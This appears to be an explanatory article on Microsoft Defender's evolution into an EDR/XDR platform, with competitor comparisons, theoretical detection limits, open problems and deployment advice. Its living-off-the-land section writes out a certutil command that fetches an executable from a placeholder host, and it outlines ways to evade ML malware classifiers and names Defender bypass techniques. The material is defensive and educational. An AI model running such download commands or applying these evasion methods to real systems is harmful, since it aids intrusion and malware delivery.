The results showed in independent testing. Defender's AV-TEST protection scores climbed from 0.5--2.0 (2012--2014) to 4.0--5.0 (2016--2017) to a consistent 6.0/6.0 from 2018 onward [@av-test]. AV-Comparatives awarded Microsoft Defender "Approved Security Product" for 2024 [@av-comparatives-2024].

Defender could now detect zero-day malware in seconds and catch fileless attacks that traditional scanners missed entirely. But detection alone wasn't enough. What happens when malware gets past every layer? The SolarWinds attack was about to teach the entire industry that lesson.

Assume Breach: EDR and the XDR Vision

The SolarWinds Sunburst backdoor, discovered in December 2020, was delivered through a legitimately signed software update from a trusted vendor. It bypassed every prevention layer -- signatures, ML, behavioral monitoring, cloud analysis -- because the malicious code arrived through a channel that should be trusted. Approximately 18,000 organizations installed the compromised update. The industry learned a painful lesson: prevention is necessary but insufficient.

Post-breach security capability that continuously monitors endpoint behavior, detects suspicious activity through behavioral analytics, correlates related alerts into incidents, and provides investigation and automated response tools. EDR operates on the "assume breach" philosophy -- accepting that prevention will inevitably be bypassed.

Microsoft had anticipated this lesson. In March 2016, they announced Windows Defender Advanced Threat Protection (ATP) at RSA Conference -- an enterprise EDR service built into Windows 10. ATP represented a philosophical shift from "prevent all threats" to "assume breach, detect, and respond."

flowchart LR A[Endpoint Sensors] --> B[Behavioral Telemetry] B --> C[Cloud Analytics] C --> D[Anomaly Detection] D --> E[Incident Correlation] E --> F{"High Confidence?"} F -->|Yes| G[Auto Remediation] F -->|No| H[SOC Analyst Review] G --> I[Kill Process / Isolate / Quarantine] H --> I

The EDR architecture collects rich behavioral telemetry from endpoints -- process creation trees, file operations, network connections, registry changes, PowerShell execution logs. This telemetry streams to Microsoft's cloud, where ML models and behavioral rules detect attack patterns like credential dumping, lateral movement, and persistence mechanisms. Related alerts are automatically grouped into incidents spanning multiple machines and timeframes.

Attack Surface Reduction

Beyond detection, Microsoft introduced Attack Surface Reduction (ASR) rules -- configurable policies that block risky behaviors proactively [@asr-rules].

Configurable rules in Microsoft Defender that block specific dangerous behaviors before they execute -- for example, blocking Office applications from creating child processes, preventing credential theft from LSASS, or blocking execution of unsigned scripts from USB drives.

ASR operates on a simple principle: certain behaviors are almost never legitimate. Office applications spawning child processes? Almost always malicious macro activity. A process reading LSASS memory? Almost always credential dumping. ASR blocks these patterns outright, without needing to classify the specific malware.

Alongside ASR, Microsoft deployed Controlled Folder Access (protecting specified directories from unauthorized modification -- a direct anti-ransomware measure), Tamper Protection (preventing malware from disabling Defender itself), and Network Protection (blocking connections to known malicious domains).

From ATP to XDR

Cross-domain security platform that correlates signals across endpoints, email, identity, and cloud applications into a unified detection and response system. XDR extends EDR's assume-breach philosophy from individual endpoints to the entire organizational attack surface.

As the Sunburst incident demonstrated, ATP's fundamental limitation was endpoint-only visibility -- it had no insight into email-based attacks, identity compromises, or cloud application abuse. Sophisticated attacks span multiple vectors.

Microsoft's response was to unify all its security products into Microsoft Defender XDR -- correlating signals from Defender for Endpoint, Defender for Office 365, Defender for Identity, and Defender for Cloud Apps. When a phishing email delivers a credential-stealing payload that enables lateral movement to a cloud application, XDR reconstructs the entire attack chain across all domains.

The platform also went cross-platform. Between 2019 and 2020, Microsoft dropped "Windows" from the name and launched support for macOS (behavioral monitoring engine), Linux (initially auditd-based sensor, migrated to eBPF in 2023), Android, and iOS [@wp-defender]. In January 2022, Defender for Endpoint Plan 1 was included in Microsoft 365 E3 licenses at no extra cost, dramatically expanding the addressable market [@mde-p1-e3].On July 19, 2024, a faulty CrowdStrike Falcon content update caused approximately 8.5 million Windows systems to crash with the blue screen of death [@crowdstrike-outage]. The incident highlighted the catastrophic risk of kernel-mode security agents and the danger of uncontrolled global content rollouts.

By 2024, Defender XDR achieved top-tier MITRE ATT&CK Enterprise results with zero false positives, with Microsoft specifically highlighting 100% technique-level detections across Linux and macOS attack stages [@mitre-2024]. The product lineage that scored 0.5/6 a decade earlier was now part of one of the top-performing security platforms in the industry. But how does it compare to the competition?

The Competition: How Defender Stacks Up

Microsoft isn't the only company that figured out cloud-scale endpoint protection. CrowdStrike, SentinelOne, Palo Alto Cortex XDR, and Sophos have all built formidable platforms. Each makes a different architectural bet -- and each has a distinctive weakness.

Feature	Microsoft Defender	CrowdStrike Falcon	SentinelOne Singularity	Cortex XDR	Sophos Intercept X
Architecture	OS-integrated + cloud	Cloud-native agent	Autonomous on-device AI	Network + endpoint fusion	Prevention-first DL
MITRE 2024 claim	Enterprise: 100%, 0 FP	Managed Services: fastest detection (4 min)	Enterprise: 100%, 88% fewer alerts	Enterprise: 100%, 0 FP	Strong prevention
OS Integration	Deepest (AMSI, ELAM, Secure Boot)	Third-party agent	Third-party agent	Third-party agent	Third-party agent
Offline Capability	On-device ML + signatures	Limited (on-device ML)	Best (autonomous AI)	On-device ML	On-device DL
Ransomware Defense	Controlled Folder Access	Behavioral detection	VSS rollback	Behavioral detection	CryptoGuard rollback
Cost	Included with M365 E3/E5	Premium ($$$)	Mid-premium ($$)	Mid-premium ($$)	Mid-market ($)
Key Differentiator	OS integration + M365 stack	Threat intel + managed hunting	Autonomous response	Network-endpoint fusion	Long-tenured Gartner Leader
Key Weakness	Vendor lock-in	Premium cost; July 2024 outage risk	Smaller telemetry base	Requires Palo Alto stack	Enterprise perception

CrowdStrike Falcon dominates the pure-play EDR market with cloud-native architecture and premium threat intelligence. In the 2024 MITRE Managed Services evaluation, CrowdStrike set the record for fastest detection at four minutes [@crowdstrike-mitre-speed]. But its July 2024 outage -- when a faulty content update crashed 8.5 million Windows systems [@crowdstrike-outage] -- exposed the risks of kernel-mode agents, and premium pricing makes it cost-prohibitive for many organizations.

The July 2024 CrowdStrike incident was not a cyberattack -- it was a quality assurance failure in a content update that went global without staged rollout. But it exposed a systemic risk: kernel-mode security agents have the same level of access as the OS kernel itself. A bug in the agent crashes the entire system. This is why Microsoft has invested in Virtualization-Based Security (VBS) and Hypervisor-protected Code Integrity (HVCI) -- moving security enforcement into a layer more resilient than the traditional kernel.

SentinelOne Singularity makes the opposite bet from CrowdStrike: autonomous on-device AI that can detect, respond, and remediate without cloud connectivity or human intervention. Its Storyline technology automatically chains related events into coherent attack narratives. In the 2024 MITRE evaluation, SentinelOne achieved 100% detection with 88% fewer alerts than the median vendor -- the best signal-to-noise ratio [@sentinelone-mitre]. Its ransomware rollback via VSS snapshots is a unique capability.

Palo Alto Cortex XDR brings a network-centric heritage, uniquely correlating firewall telemetry with endpoint data. It achieved 100% technique-level detection with no configuration changes, and the highest prevention rate with zero false positives in MITRE 2024 -- the first participant to achieve 100% detection with no configuration changes ever [@cortex-xdr-mitre]. But without Palo Alto firewalls, Cortex XDR loses its key differentiator.

Sophos Intercept X holds one of the longer tenures as a Gartner EPP Leader, with 16 consecutive years of Leader placements (since the inaugural 2007 EPP Magic Quadrant) by 2025 [@sophos-gartner-2025]. Its deep learning engine and CryptoGuard anti-ransomware technology are strong, and its pricing targets the mid-market effectively.

Note: If you're in the Microsoft 365 environment, Defender for Endpoint offers the best cost-to-value ratio with the deepest OS integration. If you need cloud-native threat intelligence with managed hunting, CrowdStrike Falcon is the premium choice. If autonomous offline protection matters most, SentinelOne excels. If you have Palo Alto firewalls, Cortex XDR's network-endpoint correlation is unmatched. For mid-market budgets, Sophos offers strong prevention at competitive pricing.

All five platforms achieve remarkable detection rates -- 99.9%+ in controlled testing. But none of them can be perfect. A 1986 PhD thesis proved that, and the proof still holds.

Theoretical Limits: The Defender's Dilemma

In his 1986 dissertation, with the journal version following in 1987, Fred Cohen proved something uncomfortable: perfect virus detection is mathematically impossible [@cohen-1986]. His proof reduces the problem to the Halting Problem -- and Alan Turing showed in 1936 that the Halting Problem is undecidable. Every antivirus product, including Defender, operates under this ceiling.

The general form of the virus detection problem is algorithmically undecidable. -- Fred Cohen, 1986 dissertation [@cohen-1986]

The proof works by contradiction. Assume a perfect virus detector $D(P)$ exists -- a function that takes any program $P$ as input and returns true if $P$ is a virus and false otherwise. Now construct a program $V$ that:

Runs $D$ on itself
If $D(V)$ says "virus," $V$ does nothing harmful (benign behavior)
If $D(V)$ says "not a virus," $V$ becomes a virus

This creates a contradiction: if $D$ says $V$ is a virus, $V$ is benign. If $D$ says $V$ is benign, $V$ is a virus. Therefore, $D$ cannot exist. The construction mirrors Turing's proof that no algorithm can determine whether an arbitrary program halts.

flowchart TD A[Assume perfect detector D exists] --> B[Construct program V] B --> C[V runs D on itself] C --> D1{"D says V = virus?"} D1 -->|Yes| E[V does nothing harmful] D1 -->|No| F[V becomes a virus] E --> G[Contradiction: V is benign but D said virus] F --> H[Contradiction: V is a virus but D said benign] G --> I[Therefore D cannot exist] H --> I A property of computational problems for which no algorithm can produce a correct answer for all possible inputs. Fred Cohen's 1986 dissertation proof that general virus detection is undecidable means that no antivirus -- no matter how advanced its ML models or how vast its training data -- can correctly classify every possible program as malicious or benign.

Key idea: Defender achieving 100% in MITRE evaluations is remarkable -- but it is 100% of that specific test set, not 100% of all possible malware. The theoretical ceiling is real and unbridgeable. No amount of ML training data or cloud compute will ever close the gap.

The Base Rate Fallacy

Even setting aside undecidability, practical detection at scale faces a statistical nightmare. Consider a system with 99.99% accuracy scanning 100 billion events per day across a large enterprise. A 0.01% false positive rate yields approximately 10 million false alerts per day. This is the base rate fallacy: when the base rate of true positives is low (most events are benign), even extremely accurate classifiers produce overwhelming false positive volumes.

$$\text{False Positives} = \text{Total Events} \times (1 - \text{Specificity}) = 10^{11} \times 10^{-4} = 10^{7}$$

This is why Defender's zero false positives in the MITRE evaluation -- against a curated test set of dozens of scenarios -- is impressive but not directly translatable to production environments processing billions of events.In 1996, Adam Young and Moti Yung -- Young at Columbia University and Yung at IBM Research -- introduced "cryptovirology," the theoretical framework for using public-key cryptography offensively in malware [@young-yung-1996]. They predicted the ransomware extortion model a full decade before real-world ransomware epidemics. Their work informs the cryptographic threat models that Defender's Controlled Folder Access and modern anti-ransomware features are designed to counter.

The Adversarial ML Problem

ML models can be evaded by design. Adversarial machine learning research has shown that carefully crafted perturbations can cause classifiers to misclassify malicious files as benign while preserving malicious functionality. NIST published a taxonomy of these attacks in March 2025 [@nist-adversarial-ml], and a 2025 IEEE Access survey cataloged adversarial evasion techniques specific to malware analysis [@adversarial-malware-survey].

Note: As ML becomes the primary detection mechanism across all major endpoint protection platforms, adversarial evasion attacks become a systemic industry risk. A technique that evades one vendor's ML model may generalize to others trained on similar features. There is currently no provably resilient defense against adversarial malware perturbations.

We can't build a perfect antivirus. But we can make attacks so expensive that most threat actors can't afford to succeed. The real question is: what's left to solve?

Open Problems: The Frontier

Defender XDR represents the state of the art, but the problems it can't yet solve are arguably more interesting than the ones it has solved.

Adversarial ML Evasion

The adversarial ML problem is the most pressing theoretical challenge in endpoint protection. Attackers use three main strategies to fool ML classifiers [@adversarial-malware-survey]:

Gradient-based evasion: Attackers compute the gradient of the ML model's loss function and apply small perturbations -- appending benign bytes, modifying unused PE header fields, or inserting dead code -- that flip the classifier's verdict from "malicious" to "benign" without changing the file's behavior.
Feature-space manipulation: Rather than targeting the model directly, attackers modify features the model relies on. Packing a binary to reduce entropy, removing suspicious imports, or injecting benign API calls can shift the feature vector into "clean" territory.
Black-box transfer attacks: Attackers train a substitute model on the same public malware datasets, generate adversarial examples against it, and rely on transferability -- the observation that perturbations effective against one model often fool others trained on similar data.

Defenses carry trade-offs. Adversarial training (retraining on adversarial examples) improves resilience but reduces accuracy on clean samples by 2--5%. Defensive distillation smooths decision boundaries but is vulnerable to targeted Carlini-Wagner attacks. Certified resilience bounds provide formal guarantees for specific perturbation radii but scale poorly to the high-dimensional feature spaces of PE files [@nist-adversarial-ml].

The fundamental difficulty is asymmetric: the attacker only needs to find one evasion; the defender must block all of them. This asymmetry may be irreducible -- it follows from the same undecidability result that limits all virus detection.

Living-off-the-Land Binaries

Legitimate, Microsoft-signed system binaries -- such as PowerShell, certutil.exe, mshta.exe, and bitsadmin.exe -- that attackers repurpose for malicious activities. Because these tools are trusted by the OS and required for legitimate operations, they cannot simply be blocked without breaking normal functionality.

Attackers increasingly use the system's own tools against it. Cybereason incident response found LOLBin involvement in an estimated 17% of security incidents in Q3 2025, up from roughly 13% in the first half of the year [@cybereason-lolbin]. The LOLBAS project catalogs hundreds of legitimate binaries, scripts, and libraries that can be abused [@lolbas-project].

The detection challenge is distinguishing legitimate from malicious use of the same binary. When a system administrator runs certutil -urlcache -split -f http://example.com/update.exe, is it a legitimate download or attacker staging? Current detection approaches analyze command-line arguments, parent process context, and execution frequency baselines -- but false positive rates remain high for these ambiguous use cases. ML models trained on command-line features show promise, but they struggle with novel argument combinations that differ from training data.

Privacy-Preserving Telemetry

Cloud-delivered protection requires sending endpoint telemetry to vendor cloud infrastructure, raising significant privacy concerns under regulations like GDPR and CCPA. Organizations in sensitive sectors -- government, healthcare, finance -- may refuse to share endpoint data with cloud services.

Federated learning (FL) offers a path forward: training ML models across distributed endpoints without centralizing raw data. Each endpoint trains a local model on its own data and shares only model weight updates -- not raw telemetry -- with a central aggregator. Recent research (2024) demonstrated FL-trained malware detection models achieving detection rates comparable to centralized approaches, with strong adversarial resilience [@fl-malware-2024].

The challenge is federated convergence. Heterogeneous endpoint environments (different OS versions, installed software, usage patterns) create non-IID data distributions. These statistical differences slow model convergence and cause minor to non-negligible accuracy impact depending on distribution heterogeneity. Communication efficiency is another bottleneck: frequent weight updates consume bandwidth, while infrequent updates slow convergence further.

Supply Chain Attack Detection

The SolarWinds lesson remains unresolved. When malicious code arrives through a legitimately signed software update from a trusted vendor, every endpoint protection layer is bypassed by design. Current partial solutions include Software Bill of Materials (SBOM) tracking, build environment integrity verification via the SLSA framework, and behavioral monitoring of post-update software activity. None achieves full supply chain integrity verification -- the problem requires verifying the entire build and distribution pipeline, not just the final artifact.

The Bootstrap Problem

Endpoint protection agents run at kernel level to monitor the system, but the agent is only as trustworthy as the kernel itself. A kernel-level compromise (rootkit) subverts the protector entirely. Windows 11 Secured-core PCs address this with layered hardware trust: Virtualization-Based Security (VBS) isolates security-critical code in a hypervisor-protected enclave, Hypervisor-protected Code Integrity (HVCI) ensures only signed code runs in kernel mode, and Credential Guard protects authentication secrets from kernel-level theft. Intel Threat Detection Technology (TDT) offloads some detection to CPU microcode. But no solution provides formal verification of kernel integrity at runtime -- the chain of trust always terminates at hardware, and hardware can be compromised too.

The "who protects the protector?" problem has no complete software-only solution. Hardware-assisted security (TPM, Intel TDT, AMD SEV) pushes the trust anchor deeper, but the chain of trust always terminates somewhere.

Windows Defender started as an antispyware tool that couldn't detect viruses. It evolved through failure, humiliation, and relentless engineering into one of the world's most sophisticated security platforms. The next chapter -- adversarial ML, supply chain integrity, privacy-preserving telemetry -- is being written now. The only certainty is Fred Cohen's: perfection is provably impossible. But the pursuit of it protects a billion endpoints every day.

Practical Guide: Deploying Defender Today

Theory is interesting, but if you're responsible for securing endpoints, you need practical guidance. Here's how to get the most out of Defender.

Consumer vs. Enterprise Tiers

Windows Security (the consumer-facing app built into Windows 10/11) provides next-generation antivirus, cloud-delivered protection, and basic firewall management. For enterprises, Defender for Endpoint comes in two plans [@mde-p1-e3]:

Plan 1 (included in M365 E3): Next-gen AV, ASR rules, device-based conditional access, Tamper Protection
Plan 2 (M365 E5 or standalone): Everything in P1 plus EDR, automated investigation and response, threat analytics, advanced hunting, and Security Copilot integration

Enabling Cloud Protection

Cloud-delivered protection is the single most impactful feature to verify [@cloud-protection]. Without it, Defender falls back to local signatures -- essentially regressing to 2015-era detection. Verify it's enabled:

Open PowerShell as administrator and run: ``` Get-MpPreference | Select-Object MAPSReporting, SubmitSamplesConsent, CloudBlockLevel, CloudExtendedTimeout ``` Ideal values: `MAPSReporting = 2` (Advanced), `SubmitSamplesConsent = 1` (Send safe samples automatically), `CloudBlockLevel = 2` or higher.

{` // Signature-based detection: exact hash match function signatureDetect(fileHash, signatureDB) { return signatureDB.includes(fileHash); }

// ML-based detection: feature vector classification function mlDetect(features) { const { entropy, suspiciousImports, isPacked } = features; const score = (entropy > 7.0 ? 0.4 : 0) + (suspiciousImports > 5 ? 0.3 : 0) + (isPacked ? 0.3 : 0); return { malicious: score > 0.5, confidence: score }; }

// Polymorphic malware: same behavior, different hash every time const malwareHashes = ['abc123', 'def456', 'ghi789']; const signatureDB = ['abc123']; // Only first variant known

console.log('--- Signature-Based Detection ---'); malwareHashes.forEach((hash, i) => { const detected = signatureDetect(hash, signatureDB); console.log('Variant ' + (i+1) + ' (' + hash + '): ' + (detected ? 'DETECTED' : 'MISSED')); });

console.log('\n--- ML-Based Detection ---'); // All variants share behavioral features despite different hashes const sharedFeatures = { entropy: 7.8, suspiciousImports: 8, isPacked: true }; malwareHashes.forEach((hash, i) => { const result = mlDetect(sharedFeatures); console.log('Variant ' + (i+1) + ': ' + (result.malicious ? 'DETECTED' : 'MISSED') + ' (confidence: ' + result.confidence + ')'); });

console.log('\nSignatures caught 1/3 variants. ML caught 3/3.'); console.log('This is why 96% of unique malware requires ML, not signatures.'); `}

ASR Rules: What to Enable

Note: Always deploy ASR rules in audit mode first (Mode = 2) and monitor for false positives in your environment before switching to block mode (Mode = 1). Aggressive ASR rules can break legitimate line-of-business applications.

The highest-impact ASR rules to enable first [@asr-rules]:

Block Office applications from creating child processes
Block credential stealing from the Windows local security authority subsystem (LSASS)
Block executable content from email client and webmail
Block abuse of exploited vulnerable signed drivers

Common Pitfalls

The most common Defender misconfiguration is overly broad antimalware exclusions -- excluding entire directories or file types for performance reasons. Attackers actively target excluded paths; if `C:\Temp` is excluded, dropping malware there bypasses all scanning. Always exclude the narrowest possible path, and audit your exclusions regularly.

Note: Organizations that disable cloud-delivered protection for performance or privacy reasons lose the most powerful detection layer. On-device models alone miss an estimated 10--15% of threats that cloud models catch. If privacy regulations require limiting telemetry, use the "Send safe samples automatically" option rather than disabling cloud protection entirely.

Other common pitfalls:

Agent conflicts: Running multiple endpoint protection agents simultaneously (e.g., Defender + CrowdStrike) causes performance degradation and detection conflicts. Configure one agent in passive mode.
Delayed signature updates: Organizations with restricted update policies may have definition databases days behind, creating unnecessary vulnerability windows.

Frequently Asked Questions

For most consumers and Microsoft 365 enterprise environments, Defender provides top-tier protection. It consistently scores 6/6/6 on AV-TEST and achieved top-tier MITRE ATT&CK Enterprise results with zero false positives in 2024. Third-party solutions like CrowdStrike or SentinelOne may be preferable if you need specialized managed threat hunting, autonomous offline protection, or your organization is not in the Microsoft 365 environment. AV-TEST consistently gives Defender 6/6 for performance impact -- meaning minimal slowdown on standard operations. Cloud-based analysis offloads heavy ML inference to Microsoft's servers, keeping the on-device footprint light. Some users notice brief delays when opening unusual files for the first time (Block at First Sight holding the file for a cloud verdict), but this typically resolves in under a second. Yes, through multiple layers. Controlled Folder Access blocks unauthorized modification of protected directories. ASR rules block common ransomware delivery vectors (Office macros spawning processes, email-delivered executables). Cloud ML detects known and novel ransomware variants. Tamper Protection prevents ransomware from disabling Defender. However, no endpoint protection product can guarantee 100% ransomware prevention -- maintain offline backups as a last-resort defense. No. Consumer Windows includes Windows Security (next-gen AV, cloud protection, firewall). Enterprise customers get Defender for Endpoint Plan 1 (adds ASR rules, conditional access, Tamper Protection -- included in M365 E3) or Plan 2 (adds EDR, automated investigation, threat hunting, Security Copilot -- in M365 E5). The detection engine is the same, but enterprise tiers add investigation, response, and management capabilities. Yes. Since 2019--2020, Microsoft Defender for Endpoint supports macOS (behavioral monitoring engine), Linux (initially auditd-based sensor, migrated to eBPF in 2023), Android, and iOS. Feature parity lags behind Windows -- the macOS and Linux sensors don't have AMSI or the same depth of OS integration -- but cross-platform support is real and improving with each release. When a third-party AV is installed, Defender can operate in passive mode -- it monitors the system and provides scan-on-demand capability but does not perform real-time protection. If the third-party AV is removed or its subscription expires, Defender automatically re-enables. Running two real-time AV agents simultaneously causes performance degradation and detection conflicts. Yes. Every endpoint protection product can be bypassed -- this follows from Fred Cohen's undecidability result for general virus detection. Specific Defender bypass techniques include AMSI memory patching, LOLBin abuse, fileless in-memory execution through non-AMSI-integrated paths, and adversarial ML evasion. Microsoft continuously patches known bypasses, but the arms race is inherent to the problem. Defense in depth -- using multiple security layers, not just one product -- is the practical mitigation. See the Open Problems section above for detailed analysis of each technique and current defenses. Organizations can test their detection posture against known bypass techniques using open-source tools like Atomic Red Team.